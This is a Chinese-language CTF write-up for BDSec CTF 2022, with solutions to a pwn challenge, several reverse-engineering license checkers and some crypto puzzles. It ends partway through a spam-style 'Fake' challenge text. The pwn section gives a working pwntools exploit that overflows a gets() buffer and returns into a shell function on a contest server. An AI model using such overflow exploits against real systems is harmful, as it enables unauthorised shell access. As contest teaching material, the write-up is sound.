[BDSec CTF 2022] 部分WP

2023-11-19

组队参加了个国外的小线上赛,题目比较简单

目录

PWN

pwnrace

Reverse

BDSec License Checker 0x1

shashdot

Flag Box

Simple Math

Poster

BDSec License Checker 0x03

BDSec License Checker 0x02

Cryptography

CryptoCode

VIPx01

VIPx02

Fake

Dominoes

Loop Lover

Basically RSA

MISC

Message of Hufflepuff

Find Me Inside

NetWorking


PWN

pwnrace

pwn只有一道题是个ret2system ,gets读数据到栈内,导致溢出,并且没有开canary和PIE直接溢出将shell写到ret里

// Password gate of the pwnrace binary (decompiler output, IDA naming kept).
// s1 is a 256-byte stack buffer at rbp-100h that is filled with gets(), which
// has no length limit: input longer than the buffer runs into the saved rbp
// and the return address above it. The write-up notes the binary was built
// without a stack canary or PIE, so the overwrite is neither detected nor
// randomised. Returns system()'s status when the password matches.
int heath_check()
{
  char s1[256]; // [rsp+0h] [rbp-100h] BYREF

  printf("\x1B[0;32mEnter Password:\n\x1B[0m");
  gets(s1);                                     // unbounded read into s1
  // The overwritten return address is only used on the success path: a wrong
  // password never returns, so an overflow must still start with the exact
  // password followed by a NUL so that strcmp() stops there.
  if ( strcmp(s1, "hAcK_Th3_Pl@n3t") )
  {
    printf("\x1B[41mWrong Password!!!!\n\x1B[0m");
    _exit(0);                                   // terminate immediately, no return
  }
  printf("\x1B[4;32mEnter Password:\n\x1B[0m");  // same prompt text again, as in the binary
  return system("top -b -n 1");
}
// Leftover "win" function in the pwnrace binary: spawns a shell via system().
// Not called from heath_check(); presumably the intended ret2win target. The
// write-up returns into 0x4013A8 (the lea of "/bin/sh") rather than the
// function entry, skipping the push rbp -- see the disassembly below.
int shell()
{
  return system("/bin/sh");
}

但有个小问题,直接写shell地址不行,需要跳过rbp从lea rax /bin/sh开始

.text:00000000004013A0                               ; int shell()
.text:00000000004013A0                               public shell
.text:00000000004013A0                               shell proc near
.text:00000000004013A0                               ; __unwind {
.text:00000000004013A0 F3 0F 1E FA                   endbr64
.text:00000000004013A4 55                            push    rbp
.text:00000000004013A5 48 89 E5                      mov     rbp, rsp
.text:00000000004013A8 48 8D 05 86 13 00 00          lea     rax, command                    ; "/bin/sh"
.text:00000000004013AF 48 89 C7                      mov     rdi, rax                        ; command
.text:00000000004013B2 E8 29 FD FF FF                call    _system
.text:00000000004013B2
.text:00000000004013B7 90                            nop
.text:00000000004013B8 5D                            pop     rbp
.text:00000000004013B9 C3                            retn
.text:00000000004013B9                               ; } // starts at 4013A0
.text:00000000004013B9
.text:00000000004013B9                               shell endp

完整WP

from pwn import *

context(arch='amd64', log_level='debug')

elf = ELF('./pwnrace')

#p = process('./pwnrace')
p = remote('159.223.101.241', 31337)   # contest instance used during the event

#gdb.attach(p, 'b*0x401400')
#pause()
sleep(0.2)
# Correct password, NUL-padded to 0x108 bytes: the 0x100-byte s1 buffer plus the
# 8-byte saved rbp (s1 sits at rbp-100h in heath_check). strcmp() stops at the
# first NUL, so the check still passes, and the next 8 bytes replace the saved
# return address with 0x4013A8 -- shell() just after its push rbp (see above).
p.sendlineafter(b'Password', b"hAcK_Th3_Pl@n3t".ljust(0x108, b'\x00')+ p64(0x4013a8))
p.sendline(b'cat flag')
p.interactive()
#BDSEC{pwn_is_the_way_to_haven}

Reverse

BDSec License Checker 0x1

主程序调用ns_1然后直接比较

// License check for "BDSec License Checker 0x1" (decompiler output, IDA naming kept).
// a1: the user-supplied key. Returns whatever puts() returns for the message printed.
int __fastcall ns_2(const char *a1)
{
  int v2; // [rsp+14h] [rbp-ACh]   set to 1 only when every byte matched
  int i; // [rsp+18h] [rbp-A8h]
  int v4[34]; // [rsp+20h] [rbp-A0h]   expected per-byte values; 31 entries are filled
  unsigned __int64 v5; // [rsp+A8h] [rbp-18h]   stack-protector canary copy (fs:0x28)

  v5 = __readfsqword(0x28u);
  if ( strlen(a1) > 0x1F || strlen(a1) <= 0x1E )
    return puts("Invalid license key. Please try again.");// key length must be exactly 0x1F (31)
  v4[0] = 71;
  v4[1] = 91;
  v4[2] = 43;
  v4[3] = 101;
  v4[4] = 81;
  v4[5] = 326;
  v4[6] = 806;
  v4[7] = 99;
  v4[8] = 104;
  v4[9] = 20;
  v4[10] = 16;
  v4[11] = 40;
  v4[12] = 20;
  v4[13] = 64;
  v4[14] = 104;
  v4[15] = 406;
  v4[16] = 20;
  v4[17] = 104;
  v4[18] = 706;
  v4[19] = 20;
  v4[20] = 416;
  v4[21] = 64;
  v4[22] = 89;
  v4[23] = 26;
  v4[24] = 99;
  v4[25] = 64;
  v4[26] = 10;
  v4[27] = 89;
  v4[28] = 10;
  v4[29] = 10;
  v4[30] = 526;
  v2 = 0;
  // Each byte is checked independently: reverse the decimal digits of its
  // character code (ns_1), add 5, compare with the table. The first mismatch
  // clears v2 and stops, so the key can be recovered one byte at a time.
  for ( i = 0; i < strlen(a1); ++i )
  {
    if ( (unsigned int)ns_1((unsigned int)a1[i]) + 5 != v4[i] )
    {
      v2 = 0;
      break;
    }
    v2 = 1;
  }
  if ( v2 == 1 )
    return puts("Congrats ! You found the right license key.");
  else
    return puts("Invalid license key. Please try again.");
}
// Reverses the decimal digits of a1 (e.g. 120 -> 21, 66 -> 66; 0 -> 0).
// ns_2 passes each character code of the key through this before comparing.
__int64 __fastcall ns_1(int a1)
{
  unsigned int v3; // [rsp+Ch] [rbp-8h]   accumulated reversed value

  v3 = 0;
  while ( a1 )
  {
    v3 = 10 * v3 + a1 % 10;                     // peel the lowest digit, append it
    a1 /= 10;
  }
  return v3;
}

WP

# Expected per-byte values copied from ns_2's v4 table (31 entries).
c = [71, 91, 43, 101, 81, 326, 806, 99, 104, 20, 16, 40, 20, 64, 104, 406,
     20, 104, 706, 20, 416, 64, 89, 26, 99, 64, 10, 89, 10, 10, 526]


def ns_1(a1):
    """Mirror of the binary's ns_1: reverse the decimal digits of a1 (e.g. 120 -> 21)."""
    v3 = 0
    while a1:
        a1, digit = divmod(a1, 10)
        v3 = v3 * 10 + digit
    return v3


# For each table entry take the first printable byte whose transformed value
# (ns_1(ch) + 5) matches. An entry with no match contributes nothing, exactly
# like the original loop's break-without-append.
flag = ''.join(
    next((chr(ch) for ch in range(0x21, 0x7f) if ns_1(ch) + 5 == target), '')
    for target in c
)

print(flag)
# BDSEC{l1c3n53_ch3ck3r_0x1_2022}

shashdot

提示是patch me if you can! 其实不用patch只是加密逻辑不在main里,直接找到即可,s里是65再对应加上v3

// Prints the shashdot flag (decompiler output, IDA naming kept).
// Returns the canary difference: 0 when the stack frame was not corrupted.
unsigned __int64 rrqqq()
{
  int i; // [rsp+Ch] [rbp-44h]
  char s[32]; // [rsp+10h] [rbp-40h] BYREF   output buffer
  char v3[19]; // [rsp+30h] [rbp-20h]   per-byte deltas added to 'A'
  char v4[2]; // [rsp+43h] [rbp-Dh] BYREF   immediately follows v3 on the stack
  unsigned __int64 v5; // [rsp+48h] [rbp-8h]   stack-protector canary copy (fs:0x28)

  v5 = __readfsqword(0x28u);
  v3[0] = 1;
  v3[1] = 3;
  v3[2] = 18;
  v3[3] = 4;
  v3[4] = 2;
  v3[5] = 58;
  v3[6] = 40;
  v3[7] = 30;
  v3[8] = -1;
  v3[9] = 12;
  v3[10] = 30;
  v3[11] = -1;
  v3[12] = 30;
  v3[13] = 17;
  v3[14] = 4;
  v3[15] = 30;
  v3[16] = 45;
  v3[17] = -17;
  v3[18] = -17;
  qmemcpy(v4, "!<", sizeof(v4));                // bytes 33 and 60
  memset(s, 65, 0x15uLL);                       // 21 bytes of 'A' (65)
  // The loop runs 21 times but v3 has only 19 entries: v3[19] and v3[20] land
  // in v4 (rbp-20h + 19 == rbp-Dh), so "!<" supplies the last two deltas.
  for ( i = 0; i <= 20; ++i )
    s[i] += v3[i];
  // NOTE(review): s[21] is never written here; a 21-character output relies on
  // that byte being 0 -- confirm against the binary.
  puts(s);
  return v5 - __readfsqword(0x28u);
}

WP

#rrqqq()
# rrqqq()'s v3 table (19 entries) followed by the two bytes of v4 ("!<": 33, 60),
# which the binary's 21-iteration loop reads past the end of v3.
c = [1, 3, 18, 4, 2, 58, 40, 30, -1, 12, 30, -1, 30, 17, 4, 30, 45, -17, -17, 33, 60]
# Replay the binary: every output byte starts as 'A' (65) and has its delta added.
decoded = bytes(65 + delta for delta in c)
print(decoded)
# BDSEC{i_@M_@_RE_n00b}

Flag Box

这个同上个基本一样,主逻辑在ox里,先给出串然后按指定顺序输出

 qmemcpy(v28, "dyb}_0SBhCgtUarDiEH{u", sizeof(v28));
  v0 = std::operator<<<std::char_traits<char>>(&std::cout, 66LL);
  v1 = std::operator<<<std::char_traits<char>>(v0, (unsigned int)v28[15]);
  v2 = std::operator<<<std::char_traits<char>>(v1, (unsigned int)v28[6]);
  v3 = std::operator<<<std::char_traits<char>>(v2, (unsigned int)v28[17]);
  v4 = std::operator<<<std::char_traits<char>>(v3, (unsigned int)v28[9]);
  v5 = std::operator<<<std::char_traits<char>>(v4, (unsigned int)v28[19]);
  v6 = std::operator<<<std::char_traits<char>>(v5, (unsigned int)v28[18]);
  v7 = std::operator<<<std::char_traits<char>>(v6, (unsigned int)v28[20]);
  v8 = std::operator<<<std::char_traits<char>>(v7, (unsigned int)v28[14]);
  v9 = std::operator<<<std::char_traits<char>>(v8, (unsigned int)v28[14]);
  v10 = std::operator<<<std::char_traits<char>>(v9, (unsigned int)v28[13]);
  v11 = std::operator<<<std::char_traits<char>>(v10, (unsigned int)v28[8]);
  v12 = std::operator<<<std::char_traits<char>>(v11, (unsigned int)v28[4]);
  v13 = std::operator<<<std::char_traits<char>>(v12, (unsigned int)v28[12]);
  v14 = std::operator<<<std::char_traits<char>>(v13, (unsigned int)v28[4]);
  v15 = std::operator<<<std::char_traits<char>>(v14, (unsigned int)v28[10]);
  v16 = std::operator<<<std::char_traits<char>>(v15, (unsigned int)v28[5]);
  v17 = std::operator<<<std::char_traits<char>>(v16, (unsigned int)v28[11]);
  v18 = std::operator<<<std::char_traits<char>>(v17, (unsigned int)v28[4]);
  v19 = std::operator<<<std::char_traits<char>>(v18, (unsigned int)v28[16]);
  v20 = std::operator<<<std::char_traits<char>>(v19, (unsigned int)v28[11]);
  v21 = std::operator<<<std::char_traits<char>>(v20, (unsigned int)v28[4]);
  v22 = std::operator<<<std::char_traits<char>>(v21, (unsigned int)v28[2]);
  v23 = std::operator<<<std::char_traits<char>>(v22, (unsigned int)v28[20]);
  v24 = std::operator<<<std::char_traits<char>>(v23, (unsigned int)v28[0]);
  v25 = std::operator<<<std::char_traits<char>>(v24, (unsigned int)v28[0]);
  v26 = std::operator<<<std::char_traits<char>>(v25, (unsigned int)v28[1]);
  std::operator<<<std::char_traits<char>>(v26, (unsigned int)v28[3]);
  return 0LL;

WP

#ox()
c = "dyb}_0SBhCgtUarDiEH{u"
a = [15,6,17,9,19,18,20,14,14,13,8,4,12,4,10,5,11,4,16,11,4,2,20,0,0,1,3]
flag = 'B'
for i in a:
    flag+=c[i]

print(flag)
#BDSEC{Hurrah_U_g0t_it_buddy}

Simple Math

真以为重了,同上

qmemcpy(v21, "_YDPCSeEBzZ3aA{}", sizeof(v21));
  std::operator<<<std::char_traits<char>>(
    &std::cout,
    "\nThat was easy right?\n\nBy the way,\nHere is your flag:\n\n",
    a3);
  v3 = std::operator<<<std::char_traits<char>>(&std::cout, (unsigned int)v21[8]);
  v4 = std::operator<<<std::char_traits<char>>(v3, (unsigned int)v21[2]);
  v5 = std::operator<<<std::char_traits<char>>(v4, (unsigned int)v21[5]);
  v6 = std::operator<<<std::char_traits<char>>(v5, (unsigned int)v21[7]);
  v7 = std::operator<<<std::char_traits<char>>(v6, (unsigned int)v21[4]);
  v8 = std::operator<<<std::char_traits<char>>(v7, (unsigned int)v21[14]);
  v9 = std::operator<<<std::char_traits<char>>(v8, (unsigned int)v21[11]);
  v10 = std::operator<<<std::char_traits<char>>(v9, (unsigned int)v21[12]);
  v11 = std::operator<<<std::char_traits<char>>(v10, (unsigned int)v21[10]);
  v12 = std::operator<<<std::char_traits<char>>(v11, (unsigned int)v21[1]);
  v13 = std::operator<<<std::char_traits<char>>(v12, (unsigned int)v21[0]);
  v14 = std::operator<<<std::char_traits<char>>(v13, (unsigned int)v21[3]);
  v15 = std::operator<<<std::char_traits<char>>(v14, (unsigned int)v21[6]);
  v16 = std::operator<<<std::char_traits<char>>(v15, (unsigned int)v21[13]);
  v17 = std::operator<<<std::char_traits<char>>(v16, (unsigned int)v21[9]);
  v18 = std::operator<<<std::char_traits<char>>(v17, (unsigned int)v21[1]);
  v19 = std::operator<<<std::char_traits<char>>(v18, (unsigned int)v21[15]);
  std::ostream::operator<<(v19, &std::endl<char,std::char_traits<char>>);
  return 0LL;
#fg()
c = "_YDPCSeEBzZ3aA{}"
a = [8,2,5,7,4,14,11,12,10,1,0,3,6,13,9,1,15]
flag = ''
for i in a:
    flag+=c[i]

print(flag)
#BDSEC{3aZY_PeAzY}

Poster

这个输入以后直接比较,

  printf("Flag? ");
  fgets(v8, 73, stdin);
  v3 = strlen(v8);
  v4 = 0LL;
  v5 = v3 - 1;
  do
  {
    if ( v5 == v4 )
    {
      puts("Congratulations password iss  your flag");
      return 0;
    }
    v6 = v8[v4++];
  }
  while ( v6 == LOBYTE(flag[v4 - 1]) );
.rodata:0000000000002960 42 00 44 00 45 00 43 00 7B 00+text "UTF-16LE", 'BDEC{this_Start_your_re_journey}'

BDSec License Checker 0x03

看上去很复杂,但仔细理一下,就是把大小写分开作个循环移位然后反向一次

// "BDSec License Checker 0x03" (decompiler output, IDA naming kept).
// Reads a 38-byte key, applies ROT13 per case, reverses the string, shifts
// uppercase by 2 and lowercase by 8, then compares byte-for-byte with v14.
int __cdecl main(int argc, const char **argv, const char **envp)
{
  char v4; // [rsp+5h] [rbp-13Bh]
  char v5; // [rsp+5h] [rbp-13Bh]
  char v6; // [rsp+5h] [rbp-13Bh]
  int j; // [rsp+8h] [rbp-138h]
  int k; // [rsp+8h] [rbp-138h]
  int m; // [rsp+8h] [rbp-138h]
  int v10; // [rsp+Ch] [rbp-134h]   set to 1 only when every byte matched
  int i; // [rsp+10h] [rbp-130h]
  int v12; // [rsp+14h] [rbp-12Ch]   length used by the reversal
  char v13; // [rsp+1Ch] [rbp-124h]   swap temporary
  int v14[40]; // [rsp+20h] [rbp-120h]   expected final bytes, 38 entries filled
  char s[104]; // [rsp+C0h] [rbp-80h] BYREF   input buffer
  unsigned __int64 v16; // [rsp+128h] [rbp-18h]   stack-protector canary copy (fs:0x28)

  v16 = __readfsqword(0x28u);
  v10 = 0;
  // Entries 15 (-128) and 27 (-127) are outside both letter ranges, so those
  // two positions cannot be recovered by undoing the letter transforms.
  v14[0] = 125;
  v14[1] = 120;
  v14[2] = 84;
  v14[3] = 110;
  v14[4] = 83;
  v14[5] = 119;
  v14[6] = 95;
  v14[7] = 84;
  v14[8] = 84;
  v14[9] = 109;
  v14[10] = 87;
  v14[11] = 111;
  v14[12] = 95;
  v14[13] = 109;
  v14[14] = 84;
  v14[15] = -128;
  v14[16] = 82;
  v14[17] = 122;
  v14[18] = 87;
  v14[19] = 120;
  v14[20] = 95;
  v14[21] = 84;
  v14[22] = 110;
  v14[23] = 105;
  v14[24] = 84;
  v14[25] = 120;
  v14[26] = 88;
  v14[27] = -127;
  v14[28] = 95;
  v14[29] = 110;
  v14[30] = 73;
  v14[31] = 100;
  v14[32] = 123;
  v14[33] = 82;
  v14[34] = 84;
  v14[35] = 72;
  v14[36] = 83;
  v14[37] = 81;
  puts("\t----------------------------");
  puts("\t BDSEC License Checker 0x03");
  puts("\t----------------------------\n");
  printf("Please enter your license to continue : ");
  gets(s, argv);                                // decompiler artefact: gets() takes one argument; the read into s[104] is unbounded
  if ( strlen(s) == 38 )
  {
    // Pass 1: ROT13, handled separately for lowercase and uppercase; other bytes untouched.
    for ( i = 0; i < strlen(s); ++i )
    {
      if ( s[i] <= 64 || s[i] > 90 )
      {
        if ( s[i] > 96 && s[i] <= 122 )
        {
          if ( s[i] <= 96 || s[i] > 109 )       // lowercase ROT13: n..z down by 13, a..m up by 13
            s[i] -= 13;
          else
            s[i] += 13;
        }
      }
      else if ( s[i] <= 63 || s[i] > 77 )
      {                                         // uppercase ROT13: N..Z down by 13
        s[i] -= 13;
      }
      else
      {
        s[i] += 13;                             // A..M up by 13
      }
    }
    v12 = strlen(s);
    for ( j = 0; j < v12 / 2; ++j )             // Pass 2: reverse the string in place
    {
      v13 = s[j];
      s[j] = s[v12 - j - 1];
      s[v12 - j - 1] = v13;
    }
    // Pass 3: Caesar shift with wrap-around, different amounts per case.
    for ( k = 0; s[k]; ++k )
    {
      v4 = s[k];
      if ( v4 <= 96 || v4 > 122 )
      {
        if ( v4 > 64 && v4 <= 90 )
        {                                       // uppercase: shift right by 2, wrap within A..Z
          v6 = v4 + 2;
          if ( v6 > 90 )
            v6 -= 26;
          s[k] = v6;
        }
      }
      else
      {
        v5 = v4 + 8;                            // lowercase: shift right by 8, wrap within a..z
        if ( v5 > 122 )
          v5 -= 26;
        s[k] = v5;
      }
    }
    // Final compare; the first mismatch clears v10 and stops.
    for ( m = 0; m < strlen(s); ++m )
    {
      if ( s[m] != v14[m] )
      {
        v10 = 0;
        break;
      }
      v10 = 1;
    }
    if ( v10 == 1 )
      puts(
        "Congratulations for finding the right license key. I wish I had premium service for you :P But you can get point"
        "s by submitting the license key.");
    else
      puts("Invalid license key. Please try again.");
  }
  else
  {
    puts("Invalid license key. Please try again.");
  }
  return 0;
}

但这有个小坑点:对比串里有-128和-127这两个数逆不回来,所以这两个字母是根据单词猜的

# main()'s v14 table: the fully transformed key. -128 and -127 are written here
# as the unsigned bytes 128 and 129.
c = [125, 120, 84, 110, 83, 119, 95, 84, 84, 109, 87, 111, 95, 109, 84, 128, 82, 122, 87,
     120, 95, 84, 110, 105, 84, 120, 88, 129, 95, 110, 73, 100, 123, 82, 84, 72, 83, 81]


def _unshift(code):
    """Undo the binary's last pass: uppercase was rotated right by 2, lowercase by 8."""
    if ord('A') <= code <= ord('Z'):
        code -= 2
        if code < ord('A'):
            code += 26
    elif ord('a') <= code <= ord('z'):
        code -= 8
        if code < ord('a'):
            code += 26
    return code


def _rot13(code):
    """Undo the binary's first pass (ROT13 is its own inverse); non-letters pass through."""
    for base in (ord('A'), ord('a')):
        if base <= code < base + 26:
            return code + 13 if code < base + 13 else code - 13
    return code


# Undo the two letter passes byte by byte, then undo the reversal. The two
# non-letter entries (128, 129) pass through untouched and have to be guessed.
flag = ''.join(chr(_rot13(_unshift(code))) for code in c)
print(flag[::-1])
# BDSEC{iTs_IcEnsE_cHeCEr_tHrEE_bDsEc}   two letters guessed from the words
# BDSEC{iTs_lIcEnsE_cHeCkEr_tHrEE_bDsEc}

BDSec License Checker 0x02

这个是先出的,但是分值高排后边了

跟3相似,只是没有反向,可以直接爆破,不需要理解

 v10 = 65;
  v9 = 63;
  v11 = 0;
  v5[0] = 109;
  v5[1] = 111;
  v5[2] = 126;
  v5[3] = 112;
  v5[4] = 110;
  v5[5] = 128;
  v5[6] = 119;
  v5[7] = 116;
  v5[8] = 110;
  v5[9] = 112;
  v5[10] = 121;
  v5[11] = 58;
  v5[12] = 56;
  v5[13] = 100;
  v5[14] = 110;
  v5[15] = 115;
  v5[16] = 112;
  v5[17] = 110;
  v5[18] = 118;
  v5[19] = 56;
  v5[20] = 125;
  v5[21] = 100;
  v5[22] = 53;
  v5[23] = 105;
  v5[24] = 53;
  v5[25] = 55;
  v5[26] = 100;
  v5[27] = 55;
  v5[28] = 53;
  v5[29] = 55;
  v5[30] = 55;
  v5[31] = 100;
  v5[32] = 121;
  v5[33] = 58;
  v5[34] = 130;
  puts("\t----------------------------");
  puts("\t BDSEC License Checker 0x02");
  puts("\t----------------------------\n");
  printf("Please enter your license to continue : ");
  gets(s, argv);
  if ( strlen(s) == 35 )
  {
    for ( i = 0; s[i]; ++i )
    {
      if ( s[i] > 96 && s[i] <= 122 )
        s[i] -= 32;
    }
    for ( i = 0; s[i]; ++i )
    {
      if ( s[i] > 64 && s[i] <= 90 )
        s[i] += 32;
    }
    for ( i = 0; s[i]; ++i )
    {
      v13 = s[i];
      if ( v13 <= 96 || v13 > 122 )
      {
        if ( v13 > 64 && v13 <= 90 )
        {
          v7 = v9 % 10;
          v13 += v9 % 10;
          if ( v13 > 90 )
            v13 -= 26;
          s[i] = v13;
        }
      }
      else
      {
        v7 = v10 % 10;
        v13 += v10 % 10;
        if ( v13 > 122 )
          v13 -= 26;
        s[i] = v13;
      }
    }
    for ( i = 0; s[i]; ++i )
    {
      v13 = s[i];
      if ( v13 <= 96 || v13 > 122 )
      {
        if ( v13 > 64 && v13 <= 90 )
        {
          v7 = v9 % 4;
          v13 += v9 % 4;
          if ( v13 > 90 )
            v13 -= 26;
          s[i] = v13;
        }
      }
      else
      {
        v7 = v10 % 4;
        v13 += v10 % 4;
        if ( v13 > 122 )
          v13 -= 26;
        s[i] = v13;
      }
    }
    for ( i = 0; ; ++i )
    {
      v3 = i;
      if ( v3 >= strlen(s) )
        break;
      v8 = s[i];
      if ( v5[i] != v8 + 5 )
      {
        v11 = 0;
        break;
      }
      v11 = 1;
    }
    if ( v11 == 1 )
      puts(
        "Congratulations for finding the right license key. I wish I had premium service for you :P But you can get point"
        "s by submitting the license key.");
    else
      puts("Invalid license key. Please try again.");
  }
  else
  {
    puts("Invalid license key. Please try again.");
  }
  return 0;

原文翻译爆破即可

# v5 table from the 0x02 binary: each entry is the transformed input byte + 5.
c = [109, 111, 126, 112, 110, 128, 119, 116, 110, 112, 121, 58, 56, 100, 110, 115, 112, 110,
     118, 56, 125, 100, 53, 105, 53, 55, 100, 55, 53, 55, 55, 100, 121, 58, 130]

v9 = 63
v10 = 65


def _checker_transform(code):
    """Replay the binary's per-byte pipeline on one input byte (value before the +5)."""
    # Two case passes: lowercase -> uppercase, then uppercase -> lowercase,
    # so every letter ends up lowercase before the shifts.
    if 96 < code <= 122:
        code -= 32
    if 64 < code <= 90:
        code += 32
    # Two Caesar passes; the binary uses v9 for uppercase and v10 for lowercase.
    for upper_shift, lower_shift in ((v9 % 10, v10 % 10), (v9 % 4, v10 % 4)):
        if 64 < code <= 90:
            code += upper_shift
            if code > 90:
                code -= 26
        elif 96 < code <= 122:
            code += lower_shift
            if code > 122:
                code -= 26
    return code


# Brute-force one position at a time: the first printable byte whose transformed
# value + 5 equals the table entry wins, exactly as the original loop does.
flag = ''.join(
    next((chr(cand) for cand in range(0x21, 0x7f)
          if _checker_transform(cand) + 5 == target), '')
    for target in c
)

print(flag)
# BDSEC{LICEN53_CHECK3R_0X02_2022_N5}

Cryptography

CryptoCode

给的密文cipher.txt,提示:I convert plain text to cipher text by using Cryptocode library . Always Remember BDSEC is a KEY . 这个看了提示就明白了用cryptocode库

c00EtfL9GPq2EItQrkFyPKIMfVFZy0O4ssXtr/V2Io7NMbNS*Brue6Cex4JuWkWU0lUEK2w==*f8EsezuHu2WBstRDlWZiLg==*CZ/4FNMavWZu3kznPrAyeg==
import cryptocode

# Ciphertext from cipher.txt; the challenge hint names the key ("BDSEC is a KEY").
CIPHERTEXT = "c00EtfL9GPq2EItQrkFyPKIMfVFZy0O4ssXtr/V2Io7NMbNS*Brue6Cex4JuWkWU0lUEK2w==*f8EsezuHu2WBstRDlWZiLg==*CZ/4FNMavWZu3kznPrAyeg=="
myDecryptedMessage = cryptocode.decrypt(CIPHERTEXT, "BDSEC")
print(myDecryptedMessage)
# BDSEC{cryp70_and_pyth0n_ar3_aw3s0me}

VIPx01

题目:

My friend gave me his game username and game id . Can decode game id ?

User : rot

Game ID : OQFRP{pelcg0_ne3_nj3f0z3}

这个是ROT13

BDSEC{crypt0_ar3_aw3s0m3}

VIPx02

这个没弄出来,分数很低但确实没作出来,也许是非常简单的加密方法,但确实想不出是哪个

My friend gave me his VIP account credential and he said to me decode my password .

User : twin13

password : 3ip2uq3mj5z95oj59s4q654j4q65hv5746oj4o64pz5644pz18f1bm5tx4v35z95oj59s6w0

Fake

一大篇文章

Dear E-Commerce professional ; This letter was specially 
selected to be sent to you . This is a one time mailing 
there is no need to request removal if you won't want 
any more . This mail is being sent in compliance with 
Senate bill 1624 , Title 1 , Section 302 ! This is 
not a get rich scheme ! Why work for somebody else 
when you can become rich as few as 60 WEEKS . Have 
you ever noticed how long the line-ups are at bank 
machines plus how long the line-ups are at bank machines 
! Well, now is your chance to capitalize on this . 
We will help you use credit cards on your website plus 
increase customer response by 140% ! You can begin 
at absolutely no cost to you ! But don't believe us 
! Prof Jones who resides in Massachusetts tried us 
and says "Now I'm rich, Rich, RICH" . This offer is 
100% legal ! We IMPLORE you - act now . Sign up a friend 
and you get half off ! God Bless . Dear Internet user 
; This letter was specially selected to be sent to 
you . If you are not interested in our publications 
and wish to be removed from our lists, simply do NOT 
respond and ignore this mail . This mail is being sent 
in compliance with Senate bill 2016 , Title 9 , Section 
302 . This is different than anything else you've seen 
! Why work for somebody else when you can become rich 
within 92 days . Have you ever noticed society seems 
to be moving faster and faster plus nobody is getting 
any younger . Well, now is your chance to capitalize 
on this . WE will help YOU use credit cards on your 
website & decrease perceived waiting time by 140% . 
You can begin at absolutely no cost to you ! But don't 
believe us ! Ms Ames who resides in Alaska tried us 
and says "I was skeptical but it worked for me" . We 
are a BBB member in good standing . Do not delay - 
order today . Sign up a friend and you get half off 
. Thank-you for your serious consideration of our offer 
! Dear Business person ; This letter was specially 
selected to be sent to you . If you no longer wish 
to receive our publications simply reply with a Subject: 
of "REMOVE" and you will immediately be removed from 
our directory . This mail is being sent in compliance 
with Senate bill 2416 , Title 1 , Section 304 . Do 
NOT confuse us with Internet scam artists . Why work 
for somebody else when you can become rich within 30 
DAYS . Have you ever noticed nobody is getting any 
younger and nearly every commercial on television has 
a .com on in it . Well, now is your chance to capitalize 
on this . WE will help YOU process your orders within 
seconds plus process your orders within seconds ! You 
are guaranteed to succeed because we take all the risk 
. But don't believe us . Mrs Simpson who resides in 
Alabama tried us and says "My only problem now is where 
to park all my cars" ! We are licensed to operate in 
all states . We BESEECH you - act now ! Sign up a friend 
and your friend will be rich too ! God Bless . Dear 
Business person , Thank-you for your interest in our 
publication ! We will comply with all removal requests 
! This mail is being sent in compliance with Senate 
bill 2416 , Title 1 , Section 301 ! THIS IS NOT MULTI-LEVEL 
MARKETING . Why work for somebody else when you can 
become rich within 10 WEEKS ! Have you ever noticed 
more people than ever are surfing the web and people 
love convenience . Well, now is your chance to capitalize 
on this ! We will help you process your orders within 
seconds and deliver goods right to the customer's doorstep 
. You are guaranteed to succeed because we take all 
the risk . But don't believe us . Mr Simpson of Georgia 
tried us and says "I've been poor and I've been rich 
- rich is better" ! We are a BBB member in good standing 
! We urge you to contact us today for your own future 
financial well-being ! Sign up a friend and you get 
half off . Thanks . Dear Sir or Madam ; You made the 
right decision when you signed up for our mailing list 
! This is a one time mailing there is no need to request 
removal if you won't want any more ! This mail is being 
sent in compliance with Senate bill 2216 ; Title 2 
; Section 307 ! This is a ligitimate business proposal 
! Why work for somebody else when you can become rich 
as few as 24 months . Have you ever noticed people 
will do almost anything to avoid mailing their bills 
plus nobody is getting any younger . Well, now is your 
chance to capitalize on this . We will help you increase 
customer response by 120% & increase customer response 
by 150% . You can begin at absolutely no cost to you 
! But don't believe us ! Mrs Anderson who resides in 
New York tried us and says "I was skeptical but it 
worked for me" . We are licensed to operate in all 
states ! So make yourself rich now by ordering immediately 
. Sign up a friend and you'll get a discount of 90% 
. Best regards . Dear Cybercitizen , Especially for 
you - this red-hot announcement ! We will comply with 
all removal requests ! This mail is being sent in compliance 
with Senate bill 1621 ; Title 4 ; Section 302 ! This 
is NOT unsolicited bulk mail . Why work for somebody 
else when you can become rich within 78 days ! Have 
you ever noticed nobody is getting any younger & most 
everyone has a cellphone ! Well, now is your chance 
to capitalize on this . WE will help YOU SELL MORE 
plus turn your business into an E-BUSINESS ! You can 
begin at absolutely no cost to you ! But don't believe 
us ! Mrs Jones who resides in North Dakota tried us 
and says "My only problem now is where to park all 
my cars" . We are a BBB member in good standing . We 
beseech you - act now ! Sign up a friend and you'll 
get a discount of 10% . Thank-you for your serious 
consideration of our offer . Dear Friend , Your email 
address has been submitted to us indicating your interest 
in our publication ! We will comply with all removal 
requests . This mail is being sent in compliance with 
Senate bill 1623 , Title 7 , Section 303 . THIS IS 
NOT A GET RICH SCHEME . Why work for somebody else 
when you can become rich inside 58 MONTHS . Have you 
ever noticed nobody is getting any younger plus nearly 
every commercial on television has a .com on in it 
! Well, now is your chance to capitalize on this ! 
WE will help YOU process your orders within seconds 
& decrease perceived waiting time by 140% ! You can 
begin at absolutely no cost to you ! But don't believe 
us . Ms Simpson of New Hampshire tried us and says 
"Now I'm rich many more things are possible" . This 
offer is 100% legal ! Do not delay - order today . 
Sign up a friend and you'll get a discount of 10% . 
Thank-you for your serious consideration of our offer 
! Dear Colleague ; Your email address has been submitted 
to us indicating your interest in our newsletter ! 
If you no longer wish to receive our publications simply 
reply with a Subject: of "REMOVE" and you will immediately 
be removed from our mailing list . This mail is being 
sent in compliance with Senate bill 1619 , Title 9 
; Section 304 ! This is NOT unsolicited bulk mail . 
Why work for somebody else when you can become rich 
as few as 82 months . Have you ever noticed the baby 
boomers are more demanding than their parents plus 
more people than ever are surfing the web . Well, now 
is your chance to capitalize on this ! We will help 
you turn your business into an E-BUSINESS & use credit 
cards on your website . You can begin at absolutely 
no cost to you . But don't believe us ! Prof Ames of 
Michigan tried us and says "I was skeptical but it 
worked for me" ! We assure you that we operate within 
all applicable laws . For the sake of your family order 
now . Sign up a friend and your friend will be rich 
too . Cheers ! Dear Internet user , Especially for 
you - this hot announcement . We will comply with all 
removal requests . This mail is being sent in compliance 
